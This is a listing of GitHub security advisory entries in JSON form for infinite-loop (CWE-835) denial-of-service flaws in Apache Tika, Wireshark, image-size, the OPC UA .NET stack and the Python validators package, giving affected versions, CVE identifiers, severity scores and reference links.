Vulnerability from github – Published: 2018-10-17 15:50 – Updated: 2021-09-01 22:17A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika's BPGParser in versions of Apache Tika before 1.18.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tika:tika-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1338"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:16:41Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "A carefully crafted (or fuzzed) file can trigger an infinite loop in Apache Tika\u0027s BPGParser in versions of Apache Tika before 1.18.",
"id": "GHSA-5mf7-26mw-3rqr",
"modified": "2021-09-01T22:17:57Z",
"published": "2018-10-17T15:50:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1338"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:2669"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-5mf7-26mw-3rqr"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/4d20c5748fb9f836653bc78a1bad991ba8485d82a1e821f70b641932@%3Cdev.tika.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Moderate severity vulnerability that affects org.apache.tika:tika-core"
}
GHSA-5MWH-VG7P-2624
Vulnerability from github – Published: 2026-04-30 09:30 – Updated: 2026-04-30 15:30SANE protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service
{
"affected": [],
"aliases": [
"CVE-2026-6531"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-30T07:16:40Z",
"severity": "MODERATE"
},
"details": "SANE protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service",
"id": "GHSA-5mwh-vg7p-2624",
"modified": "2026-04-30T15:30:39Z",
"published": "2026-04-30T09:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6531"
},
{
"type": "WEB",
"url": "https://gitlab.com/wireshark/wireshark/-/issues/21139"
},
{
"type": "WEB",
"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21139"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2026-30.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5P2G-FCMC-QVQQ
Vulnerability from github – Published: 2026-06-10 15:31 – Updated: 2026-06-10 15:31image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application.
{
"affected": [],
"aliases": [
"CVE-2025-71329"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-10T14:16:30Z",
"severity": "HIGH"
},
"details": "image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application.",
"id": "GHSA-5p2g-fcmc-qvqq",
"modified": "2026-06-10T15:31:30Z",
"published": "2026-06-10T15:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71329"
},
{
"type": "WEB",
"url": "https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-5Q2V-6J86-5H9V
Vulnerability from github – Published: 2022-06-17 21:44 – Updated: 2022-09-01 19:00A vulnerability was discovered in OPC UA .NET Standard Stack that allows a malicious client or server to cause a peer to hang with a carefully crafted message sent during secure channel creation.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.368.53"
},
"package": {
"ecosystem": "NuGet",
"name": "OPCFoundation.NetStandard.Opc.Ua.Core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.368.58"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-29862"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-17T21:44:01Z",
"nvd_published_at": "2022-06-16T17:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability was discovered in OPC UA .NET Standard Stack that allows a malicious client or server to cause a peer to hang with a carefully crafted message sent during secure channel creation.",
"id": "GHSA-5q2v-6j86-5h9v",
"modified": "2022-09-01T19:00:53Z",
"published": "2022-06-17T21:44:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OPCFoundation/UA-.NETStandard/security/advisories/GHSA-5q2v-6j86-5h9v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29862"
},
{
"type": "WEB",
"url": "https://files.opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2022-29862.pdf"
},
{
"type": "PACKAGE",
"url": "https://github.com/OPCFoundation/UA-.NETStandard"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Security Update for the OPC UA .NET Standard Stack"
}
GHSA-5QCG-W2CC-XFFW
Vulnerability from github – Published: 2020-01-21 20:32 – Updated: 2024-11-18 22:16The validators package 0.12.2 through 0.12.5 for Python enters an infinite loop when validators.domain is called with a crafted domain string. This is fixed in 0.12.6.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "validators"
},
"ranges": [
{
"events": [
{
"introduced": "0.12.2"
},
{
"fixed": "0.12.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-19588"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2020-01-21T20:31:40Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The validators package 0.12.2 through 0.12.5 for Python enters an infinite loop when validators.domain is called with a crafted domain string. This is fixed in 0.12.6.",
"id": "GHSA-5qcg-w2cc-xffw",
"modified": "2024-11-18T22:16:34Z",
"published": "2020-01-21T20:32:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19588"
},
{
"type": "WEB",
"url": "https://github.com/kvesteri/validators/issues/86"
},
{
"type": "WEB",
"url": "https://github.com/python-validators/validators/issues/86"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-5qcg-w2cc-xffw"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/validators/PYSEC-2019-134.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/python-validators/validators"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Uncontrolled resource consumption in validators Python package"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.